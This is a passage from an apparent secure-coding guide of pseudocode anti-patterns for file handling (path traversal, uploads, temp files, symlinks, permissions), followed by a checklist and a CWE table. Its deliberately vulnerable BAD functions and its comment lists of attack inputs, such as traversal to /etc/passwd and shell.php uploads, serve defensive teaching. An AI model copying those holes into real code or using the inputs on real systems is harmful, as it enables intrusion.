traversal +// ?filename=/etc/passwd -> absolute path injection + +// ======================================== +// GOOD: Secure path handling with validation +// ======================================== +CONSTANT UPLOAD_DIR = "/var/app/uploads" + +FUNCTION download_file_secure(user_requested_filename): + // Step 1: Reject obviously malicious input + IF user_requested_filename IS NULL OR user_requested_filename == "": + THROW ValidationError("Filename required") + END IF + + // Step 2: Get only the base filename, reject path components + safe_filename = get_basename(user_requested_filename) + + // Step 3: Reject filenames that are empty after basename extraction + IF safe_filename == "" OR safe_filename == "." OR safe_filename == "..": + THROW ValidationError("Invalid filename") + END IF + + // Step 4: Build the full path + full_path = join_path(UPLOAD_DIR, safe_filename) + + // Step 5: Resolve to absolute path and verify it's within allowed directory + resolved_path = resolve_absolute_path(full_path) + + IF NOT resolved_path.starts_with(UPLOAD_DIR + "/"): + log.security("Path traversal attempt blocked", { + requested: user_requested_filename, + resolved: resolved_path + }) + THROW SecurityError("Access denied") + END IF + + // Step 6: Verify file exists and is a regular file (not directory/symlink) + IF NOT file_exists(resolved_path) OR NOT is_regular_file(resolved_path): + THROW NotFoundError("File not found") + END IF + + RETURN read_file(resolved_path) +END FUNCTION + +// Alternative: Use database lookups instead of filesystem paths +FUNCTION download_file_by_id(file_id): + // Validate file_id format (UUID) + IF NOT is_valid_uuid(file_id): + THROW ValidationError("Invalid file ID") + END IF + + // Look up file metadata in database + file_record = database.query( + "SELECT storage_path, original_name, owner_id FROM files WHERE id = ?", + [file_id] + ) + + IF file_record IS NULL: + THROW NotFoundError("File not found") + END IF + + // Verify ownership + IF file_record.owner_id != current_user.id: + THROW ForbiddenError("Access denied") + END IF + + // Storage path is server-controlled, not user input + RETURN read_file(file_record.storage_path) +END FUNCTION + +// Path validation helper +FUNCTION is_safe_path(base_dir, requested_path): + // Resolve both paths to absolute canonical form + base_resolved = resolve_canonical_path(base_dir) + full_resolved = resolve_canonical_path(join_path(base_dir, requested_path)) + + // Ensure resolved path is within base directory + RETURN full_resolved.starts_with(base_resolved + PATH_SEPARATOR) +END FUNCTION +``` + +### 10.2 Unrestricted File Uploads + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No validation on uploaded files +// ======================================== +@route("/api/upload") +FUNCTION upload_file_vulnerable(request): + uploaded_file = request.files.get("file") + + // VULNERABLE: Accepts any file type + filename = uploaded_file.filename + + // VULNERABLE: Uses user-provided filename directly + save_path = "/var/app/uploads/" + filename + + // VULNERABLE: No size limits + uploaded_file.save(save_path) + + // VULNERABLE: May be served with executable MIME type + RETURN {url: "/files/" + filename} +END FUNCTION + +// Attack scenarios: +// - Upload shell.php -> execute PHP code +// - Upload malicious.html -> stored XSS +// - Upload ../../../etc/cron.d/malicious -> write to system dirs +// - Upload huge file -> disk exhaustion DoS +// - Upload polyglot (valid image + embedded JS) -> bypass checks + +// ======================================== +// GOOD: Comprehensive upload validation +// ======================================== +CONSTANT ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx"} +CONSTANT ALLOWED_MIME_TYPES = { + "image/jpeg", "image/png", "image/gif", + "application/pdf", + "application/msword", + "application/vnd.openxmlformats-officedocument.wordprocessingml.document" +} +CONSTANT MAX_FILE_SIZE = 10 * 1024 * 1024 // 10 MB +CONSTANT UPLOAD_DIR = "/var/app/uploads" + +@route("/api/upload") +FUNCTION upload_file_secure(request): + uploaded_file = request.files.get("file") + + IF uploaded_file IS NULL: + RETURN error_response(400, "No file provided") + END IF + + // Step 1: Check file size BEFORE reading into memory + content_length = request.headers.get("Content-Length") + IF content_length IS NOT NULL AND int(content_length) > MAX_FILE_SIZE: + RETURN error_response(413, "File too large") + END IF + + // Step 2: Validate original filename extension + original_filename = uploaded_file.filename + extension = get_extension(original_filename).lower() + + IF extension NOT IN ALLOWED_EXTENSIONS: + log.warning("Rejected upload with extension", {extension: extension}) + RETURN error_response(400, "File type not allowed") + END IF + + // Step 3: Read file with size limit + file_content = uploaded_file.read(MAX_FILE_SIZE + 1) + + IF len(file_content) > MAX_FILE_SIZE: + RETURN error_response(413, "File too large") + END IF + + // Step 4: Validate MIME type from file content (magic bytes) + detected_mime = detect_mime_type(file_content) + + IF detected_mime NOT IN ALLOWED_MIME_TYPES: + log.warning("MIME type mismatch", { + claimed: uploaded_file.content_type, + detected: detected_mime + }) + RETURN error_response(400, "File type not allowed") + END IF + + // Step 5: For images, verify they parse correctly (anti-polyglot) + IF detected_mime.starts_with("image/"): + TRY: + image = parse_image(file_content) + // Re-encode to strip any embedded data + file_content = encode_image(image, format=extension) + CATCH ImageParseError: + RETURN error_response(400, "Invalid image file") + END TRY + END IF + + // Step 6: Generate random filename (never use user input) + random_name = generate_uuid() + "." + extension + save_path = join_path(UPLOAD_DIR, random_name) + + // Step 7: Save with restrictive permissions + write_file(save_path, file_content, permissions=0o644) + + // Step 8: Store metadata in database + file_id = database.insert("files", { + id: generate_uuid(), + storage_name: random_name, + original_name: sanitize_filename(original_filename), + mime_type: detected_mime, + size: len(file_content), + owner_id: current_user.id, + uploaded_at: current_timestamp() + }) + + log.info("File uploaded", {file_id: file_id, size: len(file_content)}) + + RETURN { + file_id: file_id, + // Serve through controlled endpoint, not direct file access + url: "/api/files/" + file_id + } +END FUNCTION + +// Serve uploaded files safely +@route("/api/files/{file_id}") +FUNCTION serve_file_secure(request, file_id): + file_record = database.get_file(file_id) + + IF file_record IS NULL OR file_record.owner_id != current_user.id: + RETURN error_response(404, "File not found") + END IF + + file_path = join_path(UPLOAD_DIR, file_record.storage_name) + content = read_file(file_path) + + RETURN response(200, content, headers={ + // Force download for non-image types + "Content-Disposition": "attachment; filename=\"" + + sanitize_header(file_record.original_name) + "\"", + // Prevent MIME sniffing + "X-Content-Type-Options": "nosniff", + // Strict content type + "Content-Type": file_record.mime_type + }) +END FUNCTION +``` + +### 10.3 Missing File Type Validation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Extension-only or no validation +// ======================================== +FUNCTION validate_image_bad(filename, file_content): + // VULNERABLE: Only checks extension, easily spoofed + extension = get_extension(filename).lower() + + IF extension IN ["jpg", "jpeg", "png", "gif"]: + RETURN TRUE // Attacker renames malware.exe to malware.jpg + END IF + + RETURN FALSE +END FUNCTION + +FUNCTION validate_mime_header_bad(file_content): + // VULNERABLE: Only checks claimed MIME type header + mime = request.headers.get("Content-Type") + + IF mime.starts_with("image/"): + RETURN TRUE // Attacker sets Content-Type: image/png for shell.php + END IF + + RETURN FALSE +END FUNCTION + +// ======================================== +// GOOD: Multi-layer file type validation +// ======================================== + +// Magic bytes signatures for common file types +MAGIC_SIGNATURES = { + "jpg": [0xFF, 0xD8, 0xFF], + "png": [0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A], + "gif": [0x47, 0x49, 0x46, 0x38], // GIF8 + "pdf": [0x25, 0x50, 0x44, 0x46], // %PDF + "zip": [0x50, 0x4B, 0x03, 0x04], + "docx": [0x50, 0x4B, 0x03, 0x04], // DOCX is ZIP-based +} + +FUNCTION validate_file_type(filename, file_content, allowed_types): + // Layer 1: Extension validation + extension = get_extension(filename).lower() + + IF extension NOT IN allowed_types: + RETURN {valid: FALSE, reason: "Extension not allowed"} + END IF + + // Layer 2: Magic bytes validation + detected_type = detect_type_by_magic(file_content) + + IF detected_type IS NULL: + RETURN {valid: FALSE, reason: "Unknown file type"} + END IF + + IF detected_type NOT IN allowed_types: + RETURN {valid: FALSE, reason: "Content type not allowed"} + END IF + + // Layer 3: Extension matches content + IF NOT extension_matches_content(extension, detected_type): + RETURN {valid: FALSE, reason: "Extension does not match content"} + END IF + + // Layer 4: For specific types, deep validation + IF detected_type IN ["jpg", "jpeg", "png", "gif"]: + IF NOT validate_image_structure(file_content): + RETURN {valid: FALSE, reason: "Invalid image structure"} + END IF + ELSE IF detected_type == "pdf": + IF NOT validate_pdf_safe(file_content): + RETURN {valid: FALSE, reason: "PDF contains unsafe content"} + END IF + ELSE IF detected_type IN ["docx", "xlsx"]: + IF NOT validate_office_safe(file_content): + RETURN {valid: FALSE, reason: "Document contains macros"} + END IF + END IF + + RETURN {valid: TRUE, detected_type: detected_type} +END FUNCTION + +FUNCTION detect_type_by_magic(file_content): + IF len(file_content) < 8: + RETURN NULL + END IF + + header = file_content[0:8] + + FOR type_name, signature IN MAGIC_SIGNATURES: + IF header.starts_with(bytes(signature)): + RETURN type_name + END IF + END FOR + + RETURN NULL +END FUNCTION + +FUNCTION validate_image_structure(file_content): + TRY: + // Use secure image library to parse + image = image_library.decode(file_content) + + // Check for reasonable dimensions (anti-DoS) + IF image.width > 10000 OR image.height > 10000: + RETURN FALSE + END IF + + // Check pixel count (decompression bomb protection) + IF image.width * image.height > 100000000: // 100 megapixels + RETURN FALSE + END IF + + RETURN TRUE + + CATCH ImageDecodeError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION validate_pdf_safe(file_content): + TRY: + pdf = pdf_library.parse(file_content) + + // Check for JavaScript (often used in attacks) + IF pdf.contains_javascript(): + RETURN FALSE + END IF + + // Check for embedded files + IF pdf.has_embedded_files(): + RETURN FALSE + END IF + + // Check for form actions pointing to URLs + IF pdf.has_external_actions(): + RETURN FALSE + END IF + + RETURN TRUE + + CATCH PDFParseError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION validate_office_safe(file_content): + TRY: + // Office files are ZIP archives + archive = zip_library.open(file_content) + + // Check for macro-enabled formats + FOR entry IN archive.entries(): + IF entry.name.contains("vbaProject") OR entry.name.ends_with(".bin"): + RETURN FALSE // Contains macros + END IF + END FOR + + RETURN TRUE + + CATCH ZipError: + RETURN FALSE + END TRY +END FUNCTION +``` + +### 10.4 Insecure Temporary File Handling + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Predictable or insecure temp files +// ======================================== + +// Mistake 1: Predictable filename +FUNCTION create_temp_bad_predictable(data): + // VULNERABLE: Attacker can predict and pre-create file + temp_path = "/tmp/myapp_" + current_user.id + ".tmp" + + // Race condition: attacker creates symlink before this + write_file(temp_path, data) + + RETURN temp_path +END FUNCTION + +// Mistake 2: World-readable permissions +FUNCTION create_temp_bad_permissions(data): + temp_path = "/tmp/myapp_" + random_string(8) + ".tmp" + + // VULNERABLE: Default permissions may be world-readable (0644) + write_file(temp_path, data) // Other users can read + + RETURN temp_path +END FUNCTION + +// Mistake 3: Not cleaning up +FUNCTION process_upload_bad_cleanup(uploaded_data): + temp_path = "/tmp/upload_" + generate_uuid() + write_file(temp_path, uploaded_data) + + TRY: + result = process_file(temp_path) + // VULNERABLE: Temp file remains on disk if exception occurs elsewhere + RETURN result + CATCH Error as e: + // Temp file leaked! + THROW e + END TRY +END FUNCTION + +// Mistake 4: Using system temp without isolation +FUNCTION create_temp_bad_shared(data): + // VULNERABLE: Shared /tmp can be accessed by other users/processes + temp_path = temp_directory() + "/" + random_string(8) + write_file(temp_path, data) + RETURN temp_path +END FUNCTION + +// ======================================== +// GOOD: Secure temporary file handling +// ======================================== + +// Use language's secure temp file creation +FUNCTION create_temp_secure(data, suffix=".tmp"): + // mkstemp equivalent: creates file with random name and 0600 permissions + temp_file = create_secure_temp_file( + prefix="myapp_", + suffix=suffix, + dir="/var/app/tmp" // App-specific temp directory + ) + + // Write data to already-open file handle (no race condition) + temp_file.write(data) + temp_file.flush() + + RETURN temp_file +END FUNCTION + +// Process with guaranteed cleanup +FUNCTION process_upload_secure(uploaded_data): + temp_file = NULL + + TRY: + // Create secure temp file + temp_file = create_secure_temp_file( + prefix="upload_", + suffix=get_safe_extension(uploaded_data.filename), + dir=APPLICATION_TEMP_DIR + ) + + // Write with explicit permissions + temp_file.write(uploaded_data.content) + temp_file.flush() + + // Process the file + result = process_file(temp_file.path) + + RETURN result + + FINALLY: + // Always clean up, even on exception + IF temp_file IS NOT NULL: + TRY: + temp_file.close() + delete_file(temp_file.path) + CATCH: + log.warning("Failed to clean up temp file", {path: temp_file.path}) + END TRY + END IF + END TRY +END FUNCTION + +// Context manager pattern for automatic cleanup +FUNCTION with_temp_file(data, callback): + temp_file = create_secure_temp_file(prefix="ctx_") + + TRY: + temp_file.write(data) + temp_file.flush() + + RETURN callback(temp_file.path) + + FINALLY: + temp_file.close() + secure_delete(temp_file.path) // Overwrite before delete for sensitive data + END TRY +END FUNCTION + +// Usage: +result = with_temp_file(sensitive_data, FUNCTION(path): + RETURN external_processor.process(path) +END FUNCTION) + +// Secure temp directory per-request +FUNCTION create_temp_directory_secure(): + // Create directory with random name and 0700 permissions + temp_dir = create_secure_temp_directory( + prefix="session_", + dir=APPLICATION_TEMP_DIR + ) + + // Set restrictive permissions + set_permissions(temp_dir, 0o700) + + RETURN temp_dir +END FUNCTION + +// Application startup: ensure temp directory security +FUNCTION initialize_temp_directory(): + temp_dir = APPLICATION_TEMP_DIR + + // Create if doesn't exist + IF NOT directory_exists(temp_dir): + create_directory(temp_dir, permissions=0o700) + END IF + + // Verify permissions + current_perms = get_permissions(temp_dir) + IF current_perms != 0o700: + set_permissions(temp_dir, 0o700) + END IF + + // Verify ownership + IF get_owner(temp_dir) != get_current_user(): + THROW SecurityError("Temp directory has incorrect ownership") + END IF + + // Clean up old temp files on startup + cleanup_old_temp_files(temp_dir, max_age_hours=24) +END FUNCTION + +// Secure delete for sensitive data +FUNCTION secure_delete(file_path): + IF file_exists(file_path): + // Overwrite with random data before deletion + file_size = get_file_size(file_path) + random_data = crypto.random_bytes(file_size) + write_file(file_path, random_data) + sync_to_disk(file_path) + + // Now delete + delete_file(file_path) + END IF +END FUNCTION +``` + +### 10.5 Symlink Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Following symlinks without validation +// ======================================== +FUNCTION read_user_file_vulnerable(user_id, filename): + user_dir = "/var/app/users/" + user_id + file_path = user_dir + "/" + filename + + // VULNERABLE: If filename is symlink to /etc/passwd, reads it + IF file_exists(file_path): + RETURN read_file(file_path) + END IF + + RETURN NULL +END FUNCTION + +FUNCTION delete_file_vulnerable(user_id, filename): + user_dir = "/var/app/users/" + user_id + file_path = user_dir + "/" + filename + + // VULNERABLE: Attacker creates symlink to critical file + // Symlink: /var/app/users/123/data -> /etc/passwd + // delete_file follows the symlink and deletes /etc/passwd + delete_file(file_path) +END FUNCTION + +// TOCTOU (Time of Check to Time of Use) vulnerability +FUNCTION process_file_toctou(file_path): + // Check if file is safe + IF is_symlink(file_path): + THROW SecurityError("Symlinks not allowed") + END IF + + // VULNERABLE: Race condition between check and use + // Attacker replaces regular file with symlink here + + // Process the file (now following attacker's symlink) + content = read_file(file_path) + RETURN process_content(content) +END FUNCTION + +// ======================================== +// GOOD: Safe symlink handling +// ======================================== + +// Option 1: Reject symlinks entirely +FUNCTION read_user_file_no_symlinks(user_id, filename): + user_dir = "/var/app/users/" + user_id + + // Validate filename + IF NOT is_safe_filename(filename): + THROW ValidationError("Invalid filename") + END IF + + file_path = join_path(user_dir, filename) + + // Use lstat to check WITHOUT following symlinks + file_stat = lstat(file_path) // NOT stat() + + IF file_stat IS NULL: + THROW NotFoundError("File not found") + END IF + + // Reject if symlink + IF file_stat.is_symlink: + log.security("Symlink access blocked", {path: file_path}) + THROW SecurityError("Access denied") + END IF + + // Reject if not regular file + IF NOT file_stat.is_regular_file: + THROW ValidationError("Not a regular file") + END IF + + // Use O_NOFOLLOW flag when opening + file_handle = open_file(file_path, flags=O_RDONLY | O_NOFOLLOW) + content = file_handle.read() + file_handle.close() + + RETURN content +END FUNCTION + +// Option 2: Resolve and validate path before access +FUNCTION read_file_resolved(base_dir, relative_path): + // Get the real path resolving all symlinks + requested_path = join_path(base_dir, relative_path) + real_path = realpath(requested_path) + + // Verify real path is within allowed base directory + real_base = realpath(base_dir) + + IF NOT real_path.starts_with(real_base + "/"): + log.security("Path escape via symlink", { + requested: requested_path, + resolved: real_path, + base: real_base + }) + THROW SecurityError("Access denied") + END IF + + RETURN read_file(real_path) +END FUNCTION + +// Option 3: Atomic operations to prevent TOCTOU +FUNCTION process_file_atomic(file_path): + // Open with O_NOFOLLOW - fails if symlink + TRY: + file_handle = open_file(file_path, flags=O_RDONLY | O_NOFOLLOW) + CATCH SymlinkError: + THROW SecurityError("Symlinks not allowed") + END TRY + + // fstat the open handle, not the path (prevents TOCTOU) + file_stat = fstat(file_handle) + + // Verify it's still a regular file + IF NOT file_stat.is_regular_file: + file_handle.close() + THROW ValidationError("Not a regular file") + END IF + + // Read from the verified handle + content = file_handle.read() + file_handle.close() + + RETURN process_content(content) +END FUNCTION + +// Safe file writing with symlink protection +FUNCTION write_file_safe(directory, filename, content): + // Validate filename + IF NOT is_safe_filename(filename): + THROW ValidationError("Invalid filename") + END IF + + file_path = join_path(directory, filename) + + // Check if path already exists + existing_stat = lstat(file_path) + + IF existing_stat IS NOT NULL: + IF existing_stat.is_symlink: + THROW SecurityError("Cannot overwrite symlink") + END IF + END IF + + // Open with O_CREAT | O_EXCL to fail if exists (then retry with O_TRUNC) + // Or use O_NOFOLLOW if supported for writing + TRY: + // Write to temp file first, then atomic rename + temp_path = join_path(directory, "." + generate_uuid() + ".tmp") + + file_handle = open_file(temp_path, + flags=O_WRONLY | O_CREAT | O_EXCL, + permissions=0o644 + ) + file_handle.write(content) + file_handle.flush() + file_handle.close() + + // Atomic rename (on same filesystem) + rename_file(temp_path, file_path) + + CATCH FileExistsError: + // Handle race condition + THROW ConcurrencyError("File creation conflict") + END TRY +END FUNCTION + +// Directory traversal with symlink safety +FUNCTION list_directory_safe(dir_path): + real_dir = realpath(dir_path) + entries = [] + + FOR entry IN list_directory(real_dir): + entry_path = join_path(real_dir, entry.name) + entry_stat = lstat(entry_path) // Don't follow symlinks + + entry_info = { + name: entry.name, + is_file: entry_stat.is_regular_file, + is_dir: entry_stat.is_directory, + is_symlink: entry_stat.is_symlink, + size: entry_stat.size IF entry_stat.is_regular_file ELSE 0 + } + + // Optionally resolve symlink target for display + IF entry_stat.is_symlink: + entry_info.symlink_target = readlink(entry_path) + // Check if symlink points outside directory + real_target = realpath(entry_path) + entry_info.safe = real_target.starts_with(real_dir + "/") + END IF + + entries.append(entry_info) + END FOR + + RETURN entries +END FUNCTION +``` + +### 10.6 Unsafe File Permissions + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Overly permissive file permissions +// ======================================== + +// Mistake 1: World-readable sensitive files +FUNCTION save_config_bad(config_data): + // VULNERABLE: Default umask may create 0644 (world-readable) + write_file("/etc/myapp/config.json", json_encode(config_data)) + // Config contains database passwords, API keys, etc. +END FUNCTION + +// Mistake 2: World-writable files +FUNCTION create_log_bad(): + log_path = "/var/log/myapp/app.log" + + // VULNERABLE: 0666 allows any user to modify logs + write_file(log_path, "", permissions=0o666) +END FUNCTION + +// Mistake 3: Executable when shouldn't be +FUNCTION save_upload_bad(content, filename): + path = "/var/app/uploads/" + filename + + // VULNERABLE: 0755 makes file executable + write_file(path, content, permissions=0o755) + // Attacker uploads shell script and executes it +END FUNCTION + +// Mistake 4: Directory permissions too open +FUNCTION create_user_dir_bad(user_id): + dir_path = "/var/app/users/" + user_id + + // VULNERABLE: 0777 allows anyone to read/write/traverse + create_directory(dir_path, permissions=0o777) +END FUNCTION + +// Mistake 5: Not checking permissions on read +FUNCTION load_config_bad(): + config_path = "/etc/myapp/secrets.json" + + // VULNERABLE: Loads config without verifying it hasn't been tampered + RETURN json_decode(read_file(config_path)) +END FUNCTION + +// ======================================== +// GOOD: Secure file permissions +// ======================================== + +// Permission constants +CONSTANT PERM_OWNER_ONLY = 0o600 // -rw------- +CONSTANT PERM_OWNER_READ_ONLY = 0o400 // -r-------- +CONSTANT PERM_STANDARD_FILE = 0o644 // -rw-r--r-- +CONSTANT PERM_PRIVATE_DIR = 0o700 // drwx------ +CONSTANT PERM_STANDARD_DIR = 0o755 // drwxr-xr-x + +FUNCTION save_sensitive_config(config_data): + config_path = "/etc/myapp/secrets.json" + + // Set restrictive umask for this operation + old_umask = set_umask(0o077) + + TRY: + // Write to temp file first + temp_path = config_path + ".tmp" + write_file(temp_path, json_encode(config_data)) + + // Explicitly set permissions (don't rely on umask) + set_permissions(temp_path, PERM_OWNER_ONLY) + + // Set ownership to service account + set_owner(temp_path, "myapp", "myapp") + + // Atomic rename + rename_file(temp_path, config_path) + + FINALLY: + // Restore umask + set_umask(old_umask) + END TRY +END FUNCTION + +FUNCTION create_log_secure(): + log_dir = "/var/log/myapp" + log_path = log_dir + "/app.log" + + // Ensure directory exists with correct permissions + IF NOT directory_exists(log_dir): + create_directory(log_dir, permissions=PERM_STANDARD_DIR) + set_owner(log_dir, "myapp", "myapp") + END IF + + // Create log file with appropriate permissions + // 0640 = owner read/write, group read, others none + IF NOT file_exists(log_path): + write_file(log_path, "", permissions=0o640) + set_owner(log_path, "myapp", "adm") // adm group can read logs + END IF +END FUNCTION + +FUNCTION save_upload_secure(content, filename, user_id): + uploads_dir = "/var/app/uploads" + user_dir = join_path(uploads_dir, user_id) + + // Ensure user directory exists + IF NOT directory_exists(user_dir): + create_directory(user_dir, permissions=PERM_PRIVATE_DIR) + END IF + + // Generate safe filename + safe_name = generate_uuid() + get_safe_extension(filename) + file_path = join_path(user_dir, safe_name) + + // Save with NO execute permission, owner read/write only + write_file(file_path, content, permissions=PERM_OWNER_ONLY) + + RETURN file_path +END FUNCTION + +FUNCTION load_config_secure(config_path): + // Verify file exists + IF NOT file_exists(config_path): + THROW ConfigError("Config file not found") + END IF + + // Check permissions before loading + file_stat = stat(config_path) + + // Reject if world-readable or world-writable + IF file_stat.mode & 0o004: // World readable + THROW SecurityError("Config file is world-readable") + END IF + + IF file_stat.mode & 0o002: // World writable + THROW SecurityError("Config file is world-writable") + END IF + + // Verify ownership + expected_owner = get_service_user() + IF file_stat.owner != expected_owner: + THROW SecurityError("Config file has incorrect ownership") + END IF + + // Safe to load + RETURN json_decode(read_file(config_path)) +END FUNCTION + +// Verify and fix permissions on startup +FUNCTION verify_file_permissions(): + critical_files = [ + {path: "/etc/myapp/secrets.json", expected: 0o600, type: "file"}, + {path: "/etc/myapp", expected: 0o700, type: "directory"}, + {path: "/var/app/private", expected: 0o700, type: "directory"}, + {path: "/var/app/uploads", expected: 0o755, type: "directory"} + ] + + FOR item IN critical_files: + IF NOT exists(item.path): + log.warning("Missing path", {path: item.path}) + CONTINUE + END IF + + current_stat = stat(item.path) + current_mode = current_stat.mode & 0o777 // Permission bits only + + IF current_mode != item.expected: + log.warning("Fixing permissions", { + path: item.path, + current: format_octal(current_mode), + expected: format_octal(item.expected) + }) + set_permissions(item.path, item.expected) + END IF + + // Check for world-writable + IF current_mode & 0o002: + log.error("World-writable file detected", {path: item.path}) + THROW SecurityError("Critical file is world-writable: " + item.path) + END IF + END FOR + + log.info("File permissions verified") +END FUNCTION + +// Secure file copy +FUNCTION copy_file_secure(source, destination, preserve_permissions=FALSE): + // Read source + source_stat = stat(source) + + IF source_stat.is_symlink: + THROW SecurityError("Cannot copy symlinks") + END IF + + content = read_file(source) + + // Determine permissions for destination + IF preserve_permissions: + dest_perms = source_stat.mode & 0o777 + // But never preserve world-writable + dest_perms = dest_perms & ~0o002 + ELSE: + // Default to secure permissions + dest_perms = PERM_OWNER_ONLY + END IF + + // Write with explicit permissions + write_file(destination, content, permissions=dest_perms) +END FUNCTION +``` + +--- + +## Pre-Generation Security Checklist + +**Before generating ANY code, verify these critical security requirements:** + +### ✓ Secrets & Credentials +- [ ] No hardcoded API keys, passwords, tokens, or secrets +- [ ] Credentials loaded from environment variables or secret managers +- [ ] No secrets in client-side/frontend code +- [ ] Git history checked for accidentally committed secrets + +### ✓ Input Handling +- [ ] All user input validated on the SERVER side +- [ ] Input type, length, and format constraints enforced +- [ ] Database queries use parameterized/prepared statements +- [ ] Shell commands use argument arrays, not string concatenation +- [ ] File paths validated and canonicalized before use + +### ✓ Output Encoding +- [ ] HTML output properly encoded to prevent XSS +- [ ] Context-appropriate encoding (HTML, URL, JS, CSS) +- [ ] Content-Security-Policy header configured +- [ ] Error messages don't expose internal details + +### ✓ Authentication & Sessions +- [ ] Passwords hashed with bcrypt/Argon2 (not MD5/SHA1) +- [ ] Session tokens generated with cryptographically secure randomness +- [ ] Session IDs regenerated on authentication state changes +- [ ] Rate limiting on authentication endpoints +- [ ] JWT tokens use strong secrets and explicit algorithms + +### ✓ Cryptography +- [ ] Modern algorithms only (AES-GCM, ChaCha20-Poly1305) +- [ ] Keys from environment/secret manager, not hardcoded +- [ ] Unique IVs/nonces for each encryption operation +- [ ] Key derivation uses PBKDF2/Argon2/scrypt + +### ✓ File Operations +- [ ] File uploads validate extension, MIME type, and magic bytes +- [ ] File size limits enforced +- [ ] Uploaded files stored outside web root +- [ ] Path traversal prevented with basename + realpath validation +- [ ] Temp files use mkstemp with restrictive permissions + +### ✓ API Security +- [ ] All endpoints require authentication (unless explicitly public) +- [ ] Object-level authorization verified (ownership checks) +- [ ] Response DTOs with explicit field allowlists +- [ ] Rate limiting applied to prevent abuse +- [ ] Error responses use standard format without internal details + +### ✓ Dependencies +- [ ] Package names verified to exist before importing +- [ ] Dependencies pinned to exact versions with lockfiles +- [ ] No packages with known vulnerabilities +- [ ] Transitive dependencies reviewed + +### ✓ Configuration +- [ ] Debug mode disabled in production +- [ ] Default credentials replaced with strong values +- [ ] Security headers configured (CSP, HSTS, X-Frame-Options) +- [ ] CORS restricted to known origins +- [ ] Admin interfaces protected with additional authentication + +--- + +## External References + +### OWASP Resources +- **OWASP Top 10 (2021):** https://owasp.org/Top10/ +- **OWASP ASVS:** https://owasp.org/www-project-application-security-verification-standard/ +- **OWASP Cheat Sheet Series:** https://cheatsheetseries.owasp.org/ +- **OWASP Testing Guide:** https://owasp.org/www-project-web-security-testing-guide/ + +### CWE (Common Weakness Enumeration) +- **CWE Database:** https://cwe.mitre.org/ +- **CWE Top 25 (2024):** https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html + +### CWE References in This Document +| CWE ID | Name | Sections | +|--------|------|----------| +| CWE-16 | Configuration | 7.5 | +| CWE-20 | Improper Input Validation | 6.1-6.6 | +| CWE-22 | Path Traversal | 6.6, 10.1 | +| CWE-59 | Symlink Following | 10.5 | +| CWE-78 | OS Command Injection | 2.2 | +| CWE-79 | Cross-site Scripting (XSS) | 3.1-3.5 | +| CWE-80 | Basic XSS | 3.1-3.5 | +| CWE-89 | SQL Injection | 2.1 | +| CWE-90 | LDAP Injection | 2.3 | +| CWE-117 | Log Injection | Quick Reference | +| CWE-180 | Incorrect Canonicalization | 6.6 | +| CWE-200 | Information Exposure | 9.4 | +| CWE-209 | Error Message Information Exposure | 7.2, 9.6 | +| CWE-215 | Information Exposure Through Debug | 7.1 | +| CWE-259 | Hard-coded Password | 1.1-1.5 | +| CWE-284 | Improper Access Control | 9.1 | +| CWE-287 | Improper Authentication | 4.1-4.7, 9.1 | +| CWE-307 | Brute Force | 4.2 | +| CWE-326 | Inadequate Encryption Strength | 5.1 | +| CWE-327 | Use of Broken Crypto Algorithm | 5.1 | +| CWE-328 | Weak Hash | 5.1 | +| CWE-330 | Insufficient Randomness | 5.6 | +| CWE-346 | Origin Validation Error (CORS) | 7.4 | +| CWE-377 | Insecure Temporary File | 10.4 | +| CWE-384 | Session Fixation | 4.4 | +| CWE-434 | Unrestricted File Upload | 10.2 | +| CWE-494 | Download Without Integrity Check | 8.5 | +| CWE-521 | Weak Password Requirements | 4.1 | +| CWE-613 | Insufficient Session Expiration | 4.4 | +| CWE-639 | Insecure Direct Object Reference | 9.2 | +| CWE-643 | XPath Injection | 2.4 | +| CWE-732 | Incorrect Permission Assignment | 10.6 | +| CWE-759 | Use of One-Way Hash without Salt | 5.7 | +| CWE-770 | Resource Exhaustion (Rate Limiting) | 9.5 | +| CWE-798 | Hard-coded Credentials | 1.1-1.5 | +| CWE-829 | Inclusion of Untrusted Functionality | 8.4 | +| CWE-915 | Mass Assignment | 9.3 | +| CWE-943 | NoSQL Injection | 2.5 | +| CWE-1104 | Use of Unmaintained Components | 8.1 | +| CWE-1284 | Improper Validation of Array Index | 6.3 | +| CWE-1333 | ReDoS | 6.4 | +| CWE-1336 | Template Injection | 2.6 | +| CWE-1357 | Reliance on Insufficiently Trustworthy Component | 8.1-8.6 | + +### Additional Security Resources +- **NIST NVD:** https://nvd.nist.gov/ +- **Snyk Vulnerability Database:** https://snyk.io/vuln/ +- **GitHub Advisory Database:** https://github.com/advisories +- **MITRE ATT&CK:** https://attack.mitre.org/ + +--- + +## Document Metadata + +| Field | Value | +|-------|-------| +| **Version** | 1.0.0 | +| **Created** | 2026-01-18 | +| **Last Updated** | 2026-01-18 | +| **Coverage** | 10 security domains, 50+ anti-patterns | +| **Format** | Language-agnostic pseudocode | +| **License** | MIT | + +### Version History +| Version | Date | Changes | +|---------|------|---------| +| 1.0.0 | 2026-01-18 | Initial comprehensive release covering all 10 security domains | + +### Contributing +This document is designed to be extended. When adding new anti-patterns: +1. Follow the BAD/GOOD pseudocode format +2. Include CWE references where applicable +3. Add entries to the Quick Reference Table +4. Update the Pre-Generation Checklist if needed + +--- + +## Summary + +This document provides comprehensive security anti-pattern guidance across 10 critical domains: + +1. **Secrets and Credentials Management** - Preventing credential exposure +2. **Injection Vulnerabilities** - SQL, Command, LDAP, XPath, NoSQL, Template +3. **Cross-Site Scripting (XSS)** - Reflected, Stored, DOM-based +4. **Authentication and Session Management** - Passwords, sessions, JWT, MFA +5. **Cryptographic Failures** - Algorithms, keys, randomness +6. **Input Validation** - Type checking, length limits, ReDoS +7. **Configuration and Deployment** - Debug mode, headers, CORS +8. **Dependency and Supply Chain** - Packages, typosquatting, integrity +9. **API Security** - Auth, IDOR, rate limiting, data exposure +10. **File Handling** - Uploads, path traversal, permissions + +**Key Statistics from AI Code Security Research:** 